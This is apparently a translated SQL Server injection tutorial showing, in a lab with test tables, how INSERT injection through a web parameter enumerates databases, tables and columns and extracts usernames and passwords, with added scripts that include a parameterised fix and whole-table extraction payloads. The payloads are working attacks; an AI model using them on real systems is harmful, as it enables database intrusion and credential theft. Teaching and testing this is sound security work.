0x01 Introduction

UPDATE injection and INSERT injection work the same way, so this walkthrough uses INSERT.

In both cases the injected expression is evaluated while a row is modified or inserted, and the result is read back from whatever page later displays that row.

0x02 Test data

    # test table: article
    1> select * from article;
    2> go
    +----+-----------+-----------+
    | id | title     | content   |
    +----+-----------+-----------+
    | 1  | 测试标题  | 测试内容  |
    | 2  | 测试标题2 | 测试内容2 |
    +----+-----------+-----------+
    (2 rows affected)

    # test table: users
    sql server> select * from users;
    +----+--------------+----------+
    | id | username     | password |
    +----+--------------+----------+
    | 1  | test-user-01 | 123456   |
    | 2  | test-user-02 | 234567   |
    +----+--------------+----------+
    2 rows in set (0.00 sec)

    # current login
    sql server> SELECT system_user;
    +--------+
    | field1 |
    +--------+
    | sa     |
    +--------+
    1 row in set (0.00 sec)

    # current database
    sql server> select db_name();
    +--------+
    | field1 |
    +--------+
    | test   |
    +--------+
    1 row in set (0.00 sec)
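The page never shows the server side of sql.php, so the following is an added example, not code from the original post: it recreates the two lab tables with the same names and sample rows, and models what a page doing `INSERT ... VALUES('漏洞测试', '$data')` amounts to, next to the parameterised version that stops the whole technique. The DDL, the procedure names and the use of stored procedures in place of PHP are my assumptions.

```sql
-- Added example (not from the original post). Lab tables as used in 0x02;
-- column types are assumed, the post does not show the schema.
CREATE TABLE article (
    id      INT IDENTITY(1,1) PRIMARY KEY,
    title   NVARCHAR(200),
    content NVARCHAR(MAX)
);
CREATE TABLE users (
    id       INT IDENTITY(1,1) PRIMARY KEY,
    username VARCHAR(50),
    password VARCHAR(50)
);
INSERT INTO article (title, content)
VALUES (N'测试标题', N'测试内容'), (N'测试标题2', N'测试内容2');
INSERT INTO users (username, password)
VALUES ('test-user-01', '123456'), ('test-user-02', '234567');
GO

-- Vulnerable pattern (assumed to be what sql.php does): the user-controlled
-- value is spliced into the statement text, so a closing quote in @data
-- turns the rest of the value into T-SQL that runs with the app's rights.
CREATE PROCEDURE dbo.insert_article_unsafe @data NVARCHAR(4000)
AS
BEGIN
    DECLARE @sql NVARCHAR(MAX) =
        N'INSERT INTO article (title, content) VALUES (N''漏洞测试'', ''' + @data + N''')';
    EXEC (@sql);
END;
GO

-- Safe pattern: the value travels as a parameter of sp_executesql, so
-- whatever it contains is stored as text and never parsed as SQL.
CREATE PROCEDURE dbo.insert_article_safe @data NVARCHAR(4000)
AS
BEGIN
    EXEC sp_executesql
        N'INSERT INTO article (title, content) VALUES (N''漏洞测试'', @p)',
        N'@p NVARCHAR(4000)',
        @p = @data;
END;
GO

-- The 0x03 payload, '+db_name()+', sent through both procedures.
-- Unsafe builds  INSERT ... VALUES(N'漏洞测试', ''+db_name()+'')  and stores "test";
-- safe stores the literal eleven characters  '+db_name()+'  unchanged.
EXEC dbo.insert_article_unsafe @data = N'''+db_name()+''';
EXEC dbo.insert_article_safe   @data = N'''+db_name()+''';
SELECT id, title, content FROM article WHERE title = N'漏洞测试';
GO
```

Running the last batch and comparing the two content values is the quickest way to confirm, on your own instance, which of the two patterns a given code path uses.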

0x03 Getting the database name

Note: db_name() takes an optional database id, so changing the argument walks the other databases on the instance:
db_name(1) returns the database with id 1
db_name(2) returns the database with id 2
(ids 1 to 4 are always master, tempdb, model and msdb; user databases follow. An id that does not exist returns NULL, and since ''+NULL is NULL the inserted content will be NULL rather than an empty string.)

Web request: http://www.test.com/sql.php?data='+db_name()+'

Resulting statement: INSERT INTO article(title, content)VALUES('漏洞测试', ''+db_name()+'')

    1> INSERT INTO article(title, content)VALUES('漏洞测试', ''+db_name()+'')
    2> go
    (1 rows affected)
    # current database = test
    1> select * from article
    2> go
    +----+-----------+-----------+
    | id | title     | content   |
    +----+-----------+-----------+
    | 1  | 测试标题  | 测试内容  |
    | 2  | 测试标题2 | 测试内容2 |
    | 5  | 漏洞测试  | test      |
    +----+-----------+-----------+
    (3 rows affected)
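Before putting db_name(n) into a payload it is worth seeing what it returns for each id, and how a NULL propagates through the ''+(...)+'' slot. The script below is an added example, not from the original post; the loop bound of 8 is an arbitrary choice for a small lab instance, and the ROW_NUMBER() form against sys.databases is the same template the post uses for tables in the next section.

```sql
-- Added example (not from the original post): what db_name(n) yields per id,
-- and what the ''+name+'' expression stores when the id does not exist.
DECLARE @dbs TABLE (database_id INT, name NVARCHAR(128) NULL);
DECLARE @i INT = 1;
WHILE @i <= 8   -- arbitrary bound for the lab instance
BEGIN
    -- ids 1..4 are always master, tempdb, model, msdb; user databases follow.
    -- A gap (dropped database) or an id past the end gives NULL.
    INSERT INTO @dbs (database_id, name) VALUES (@i, DB_NAME(@i));
    SET @i += 1;
END;
SELECT database_id, name, '' + name AS as_inserted FROM @dbs;
-- as_inserted is NULL wherever name is NULL: '' + NULL is NULL, so
-- article.content would hold NULL, which most pages render as blank.
-- Wrap with ISNULL() when the page cannot tell blank from NULL:
SELECT '' + ISNULL(DB_NAME(7), '(no database with id 7)') AS as_inserted;

-- The ROW_NUMBER() template from 0x04 also lists databases, and unlike
-- db_name(n) it does not skip gaps in the id sequence. Set @n = 1, 2, ...
DECLARE @n INT = 1;
SELECT name
FROM (SELECT ROW_NUMBER() OVER (ORDER BY name) AS row_number, name
      FROM sys.databases) AS a
WHERE row_number = @n;
-- Equivalent value for the data parameter of sql.php:
-- '+(select name from (select row_number() over(order by name) as row_number,name from sys.databases) as a where row_number=1)+'
```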

0x04 Getting table names

Note:
the column named in OVER(Order by name) must be a column that exists in test.dbo.sysobjects (name is used here)

To query another database, change the database part of the three-part name

for example, with databases test and test2, use
test.dbo.sysobjects
test2.dbo.sysobjects

To get the next table, change the row number, for example:
row_number=1
row_number=2
(once the number exceeds the table count the subquery returns NULL and the inserted content is NULL)

Note:
XType='U' selects all user tables of that database;
XType='S' selects all system tables of that database;

Web request: http://www.test.com/sql.php?data='+(select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType='U') as a where row_number=1)+'

Resulting statement: INSERT INTO article(title, content)VALUES('漏洞测试', ''+(select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType='U') as a where row_number=1)+'')

    # table 1
    1> INSERT INTO article (title, content)
       VALUES
       (
           '漏洞测试',
           '' + (
               SELECT name
               FROM (
                   SELECT ROW_NUMBER() OVER (ORDER BY name) AS row_number, name
                   FROM test.dbo.sysobjects
                   WHERE XType = 'U'
               ) AS a
               WHERE row_number = 1
           ) + ''
       )
    2> go
    (1 rows affected)
    1> select * from article
    2> go
    +----+-----------+-----------+
    | id | title     | content   |
    +----+-----------+-----------+
    | 1  | 测试标题  | 测试内容  |
    | 2  | 测试标题2 | 测试内容2 |
    | 6  | 漏洞测试  | article   |
    +----+-----------+-----------+
    (3 rows affected)

    # table 2
    1> INSERT INTO article (title, content)
       VALUES
       (
           '漏洞测试',
           '' + (
               SELECT name
               FROM (
                   SELECT ROW_NUMBER() OVER (ORDER BY name) AS row_number, name
                   FROM test.dbo.sysobjects
                   WHERE XType = 'U'
               ) AS a
               WHERE row_number = 2
           ) + ''
       )
    2> go
    (1 rows affected)
    1> select * from article
    2> go
    +----+-----------+-----------+
    | id | title     | content   |
    +----+-----------+-----------+
    | 1  | 测试标题  | 测试内容  |
    | 2  | 测试标题2 | 测试内容2 |
    | 7  | 漏洞测试  | users     |
    +----+-----------+-----------+
    (3 rows affected)

0x05 Getting column names

Note:
the column named in OVER(Order by name) must be a column that exists in test.dbo.SysColumns

To describe another table, change the argument of
Object_id('table to describe')

To get the next column, change the row number, for example:
row_number=1
row_number=2
(Order by name lists the columns alphabetically: id, password, username. Order by colid if you want them in definition order.)

Web request: http://www.test.com/sql.php?data='+(select top 1 name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.SysColumns Where id=Object_id('users')) as a where a.row_number=1)+'

Resulting statement: INSERT INTO article(title, content)VALUES('漏洞测试', ''+(select top 1 name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.SysColumns Where id=Object_id('users')) as a where a.row_number=1)+'')

    # column names of the users table
    1> select name FROM test.dbo.SysColumns Where id=Object_id('users')
    2> go
    +----------+
    | name     |
    +----------+
    | id       |
    | password |
    | username |
    +----------+
    (3 rows affected)

    # first column name of the users table in the current database
    1> INSERT INTO article (title, content)
       VALUES
       (
           '漏洞测试',
           '' + (
               SELECT TOP 1 name
               FROM (
                   SELECT ROW_NUMBER() OVER (ORDER BY name) AS row_number, name
                   FROM test.dbo.SysColumns
                   WHERE id = Object_id('users')
               ) AS a
               WHERE a.row_number = 1
           ) + ''
       )
    2> go
    (1 rows affected)
    1> select * from article
    2> go
    +----+-----------+-----------+
    | id | title     | content   |
    +----+-----------+-----------+
    | 1  | 测试标题  | 测试内容  |
    | 2  | 测试标题2 | 测试内容2 |
    | 8  | 漏洞测试  | id        |
    +----+-----------+-----------+
    (3 rows affected)

    # second column name of the users table in the current database
    1> INSERT INTO article (title, content)
       VALUES
       (
           '漏洞测试',
           '' + (
               SELECT TOP 1 name
               FROM (
                   SELECT ROW_NUMBER() OVER (ORDER BY name) AS row_number, name
                   FROM test.dbo.SysColumns
                   WHERE id = Object_id('users')
               ) AS a
               WHERE a.row_number = 2
           ) + ''
       )
    2> go
    (1 rows affected)
    1> select * from article
    2> go
    +----+-----------+-----------+
    | id | title     | content   |
    +----+-----------+-----------+
    | 1  | 测试标题  | 测试内容  |
    | 2  | 测试标题2 | 测试内容2 |
    | 9  | 漏洞测试  | password  |
    +----+-----------+-----------+
    (3 rows affected)
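The 0x04 and 0x05 queries go through sysobjects and syscolumns, which SQL Server keeps only as compatibility views; the script below, an added example that is not part of the original post, does the same enumeration against sys.tables and sys.columns, returns columns in definition order with their types, and first counts the entries so the caller knows when to stop incrementing row_number. Database test and table users are the post's; @n and @tbl are placeholders of mine.

```sql
-- Added example (not from the original post): 0x04/0x05 against the current
-- catalog views, with counts and column types. @n and @tbl are placeholders.
DECLARE @n   INT     = 1;         -- which entry to fetch (1, 2, ...)
DECLARE @tbl SYSNAME = N'users';  -- which table to describe

-- Counts first: they bound the loop over @n, and a row_number past the
-- count silently returns NULL instead of an error.
SELECT COUNT(*) AS user_tables FROM test.sys.tables;
SELECT COUNT(*) AS columns_in_tbl
FROM test.sys.columns
WHERE object_id = OBJECT_ID(N'test.dbo.' + @tbl);

-- Tables: equivalent to test.dbo.sysobjects WHERE XType='U'. The
-- three-part name works from whatever database the connection is in.
SELECT name
FROM (SELECT ROW_NUMBER() OVER (ORDER BY name) AS row_number, name
      FROM test.sys.tables) AS a
WHERE row_number = @n;

-- Columns in definition order (column_id) with their type, the order a
-- SELECT * would use. The post's ORDER BY name gives id, password,
-- username; ORDER BY column_id gives id, username, password.
SELECT name + ':' + type_name
FROM (SELECT ROW_NUMBER() OVER (ORDER BY c.column_id) AS row_number,
             c.name,
             TYPE_NAME(c.user_type_id) AS type_name
      FROM test.sys.columns AS c
      WHERE c.object_id = OBJECT_ID(N'test.dbo.' + @tbl)) AS a
WHERE row_number = @n;

-- The column query as a value for the data parameter of sql.php (entry 1):
-- '+(select name from (select row_number() over(order by column_id) as row_number,name from test.sys.columns where object_id=object_id('test.dbo.users')) as a where row_number=1)+'
```

Each SELECT returns a single scalar, so any of them can be dropped into the ''+(...)+'' slot of the INSERT unchanged.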

0x06 Getting the data

Note:
the column named in OVER(Order by username) must be a column that exists in the users table
To get the next row, change the row number, for example:
row_number=1
row_number=2

Two caveats: CAST(x AS VARCHAR) with no length means VARCHAR(30), so any value longer than 30 characters is silently cut; and if any of the concatenated columns is NULL the whole string is NULL and the inserted content is NULL.

Web request: http://www.test.com/sql.php?data='+(select cast(a.id as varchar)+'|'+cast(a.username as varchar)+'|'+cast(a.password as varchar) from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1)+'

Resulting statement: INSERT INTO article(title, content)VALUES('漏洞测试', ''+(select cast(a.id as varchar)+'|'+cast(a.username as varchar)+'|'+cast(a.password as varchar) from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1)+'')

    # first row of the users table
    1> INSERT INTO article (title, content)
       VALUES
       (
           '漏洞测试',
           '' + (
               SELECT CAST(a.id AS VARCHAR) + '|' + CAST(a.username AS VARCHAR) + '|' + CAST(a.password AS VARCHAR)
               FROM (
                   SELECT ROW_NUMBER() OVER (ORDER BY username) AS row_number, *
                   FROM users
               ) AS a
               WHERE row_number = 1
           ) + ''
       )
    2> go
    (1 rows affected)
    1> select * from article
    2> go
    +----+-----------+-----------------------+
    | id | title     | content               |
    +----+-----------+-----------------------+
    | 1  | 测试标题  | 测试内容              |
    | 2  | 测试标题2 | 测试内容2             |
    | 10 | 漏洞测试  | 1|test-user-01|123456 |
    +----+-----------+-----------------------+
    (3 rows affected)

    # second row of the users table
    1> INSERT INTO article (title, content)
       VALUES
       (
           '漏洞测试',
           '' + (
               SELECT CAST(a.id AS VARCHAR) + '|' + CAST(a.username AS VARCHAR) + '|' + CAST(a.password AS VARCHAR)
               FROM (
                   SELECT ROW_NUMBER() OVER (ORDER BY username) AS row_number, *
                   FROM users
               ) AS a
               WHERE row_number = 2
           ) + ''
       )
    2> go
    (1 rows affected)
    1> select * from article
    2> go
    +----+-----------+-----------------------+
    | id | title     | content               |
    +----+-----------+-----------------------+
    | 1  | 测试标题  | 测试内容              |
    | 2  | 测试标题2 | 测试内容2             |
    | 11 | 漏洞测试  | 2|test-user-02|234567 |
    +----+-----------+-----------------------+
    (3 rows affected)
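The two caveats above are easy to miss because the post's sample rows are short and fully populated. The script below is an added example, not from the original post: it adds one constructed row to the post's users table (a 37-character username and a NULL password), shows the post's expression losing both, then the corrected expression, and finally a form that returns the whole table in a single INSERT instead of one row per request.

```sql
-- Added example (not from the original post). The extra row is constructed
-- here to trigger both pitfalls; the users table and its columns are the post's.
INSERT INTO users (username, password)
VALUES ('user-with-a-name-longer-than-30-chars', NULL);

DECLARE @n INT = 3;   -- the constructed row sorts third by username

-- As written in the post: CAST(... AS VARCHAR) is VARCHAR(30), so the
-- username is cut to 30 characters, and because password is NULL the
-- whole expression is NULL and nothing readable is stored.
SELECT CAST(a.id AS VARCHAR) + '|' + CAST(a.username AS VARCHAR) + '|' + CAST(a.password AS VARCHAR) AS row_text
FROM (SELECT ROW_NUMBER() OVER (ORDER BY username) AS row_number, * FROM users) AS a
WHERE row_number = @n;

-- Fixed: CONCAT() converts each argument at full length and treats NULL as
-- '', and ISNULL() marks the NULL so it is not mistaken for an empty password.
SELECT CONCAT(a.id, '|', a.username, '|', ISNULL(a.password, '(null)')) AS row_text
FROM (SELECT ROW_NUMBER() OVER (ORDER BY username) AS row_number, * FROM users) AS a
WHERE row_number = @n;

-- Whole table in one value, rows separated by ';' (SQL Server 2017+).
-- The result must still fit the target column (article.content here);
-- if it does not, the INSERT fails with a truncation error and nothing
-- is stored, so fall back to row-by-row for wide tables.
SELECT STRING_AGG(CONCAT(id, '|', username, '|', ISNULL(password, '(null)')), ';')
       WITHIN GROUP (ORDER BY id) AS all_rows
FROM users;

-- Same thing for servers older than 2017. FOR XML PATH escapes <, > and &,
-- which is why the NULL marker above avoids angle brackets.
SELECT STUFF((SELECT ';' + CONCAT(id, '|', username, '|', ISNULL(password, '(null)'))
              FROM users
              ORDER BY id
              FOR XML PATH('')), 1, 1, '') AS all_rows;
```

The first query returns NULL for row 3 and would return the username cut to 30 characters even with a non-NULL password; the second returns `3|user-with-a-name-longer-than-30-chars|(null)`; the last two return all rows in one string.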